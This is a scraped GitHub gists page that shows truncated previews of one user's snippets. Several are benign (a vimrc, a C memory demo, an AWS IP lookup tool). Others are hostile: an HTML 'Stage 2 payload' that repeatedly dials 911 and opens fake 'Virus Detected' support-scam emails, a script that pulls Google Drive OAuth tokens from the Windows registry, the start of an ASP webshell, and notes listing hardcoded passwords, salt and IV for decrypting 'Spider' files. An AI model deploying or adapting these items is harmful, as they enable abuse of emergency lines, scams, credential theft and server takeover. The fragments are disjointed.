PPB: http://relay.broadcastify.com/37813088.mp3 PFD: http://relay.broadcastify.com/651178831.mp3
Max P maxrp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Stage 2: payload from meetdesai.com/ipas/+&cd=2&hl=en&ct=clnk&gl=us | |
| this is the stage that either calls folks, or opens mails to desai, or both. --> | |
| <h1>LOLOLOLOLOLOLOL</h1> | |
| <a href="tel:+1911" id="tel"></a> | |
| <a href="mailto:[email protected]?subject=Virus Detected!&body=We detected a Virus on your device! Call Apple Support now!" id="mail"></a> | |
| <script> | |
| for(i=0;i<10100101010010101001010100101001010;++i){ | |
| document.getElementById("tel").click(); document.getElementById("mail").click(); | |
| window.location = window.location; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| int main() { | |
| int stack = 10; | |
| int* heap = malloc(sizeof(int)); | |
| printf("stack = %p\nheap = %p\n\n", &stack, heap); | |
| return 0; |
maxrp
/ mrstealyogoogledriveoauth.py
Last active
August 24, 2017 23:01
— forked from anonymous/mrstealyogoogledriveoauth.py
Retrieve google drive OAuth token from the Windows Registry
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from winreg import ConnectRegistry, OpenKey, EnumValue, HKEY_CURRENT_USER | |
| TARGET_KEY = r'SOFTWARE\Google\Drive' | |
| def main(): | |
| with ConnectRegistry(None, HKEY_CURRENT_USER) as wr: | |
| GdriveKey = OpenKey(wr, TARGET_KEY) | |
| i = 0 | |
| while True: | |
| try: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # very primitive. | |
| import sys | |
| import path | |
| import plyvel | |
| if __name__ == '__main__': | |
| the_db = path.Path(sys.argv[1]) | |
| db = plyvel.DB(the_db) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " install vim-plug plugin manager https://github.com/junegunn/vim-plug | |
| call plug#begin('~/.vim/plugged') | |
| " Install the syntastic plugin | |
| Plug 'scrooloose/syntastic' | |
| " to support the syntastic plugin, you need to install a python "checker" | |
| " I use `flake8` which can be installed from `pip` | |
| " Install Inkpot theme | |
| Plug 'ciaranm/inkpot' | |
| call plug#end() |
maxrp
/ broken.diff
Created
April 7, 2019 16:43
A subtle(?) way to break option parsing in Pony (option vs. arg)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- main.pony Sun Apr 7 09:36:46 2019 | |
| +++ main.pony.broken Sun Apr 7 09:37:31 2019 | |
| @@ -25,5 +25,5 @@ | |
| env.exitcode(1) | |
| return | |
| end | |
| - let port: String = cmd.option("port").string() | |
| + let port: String = cmd.arg("port").string() | |
| env.out.print("Port="+port) |
- The default password for encrypting the HTTP Basic Auth credentials is
#SEFE3ws%1sp2 - SS3 files (spider state files) are encrypted with AES in CBC mode using a key derived from
Application Data\Spider\entropy - The default salt is
Sp1dERs@alt, this appears to be reused widely - The default IV is
@deH12NN&1t5D,fF(or is it@deH12NN&1t5D,fF?) this is reused everywhere an IV is used - The underlying contents of an SS3 file is an SQLite database
- The password to the SQLite database is approximately (pseudocode, nb: PasswordDeriveBytes provides pbkdf1):
seed = sha1(entropy_file) algorithm = sha1
iterations = 8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| Simple ASP Webshell | |
| Based on: https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asp | |
| --> | |
| <% | |
| Set oScript = Server.CreateObject("WSCRIPT.SHELL") | |
| Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") | |
| Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| This tool parses the big blob of JSON IP range mappings for AWS and prints | |
| which service and availability zone the IP occurs in. | |
| It expects to find ip-ranges.json in it's PWD. | |
| To update the JSON blob: | |
| wget https://ip-ranges.amazonaws.com/ip-ranges.json |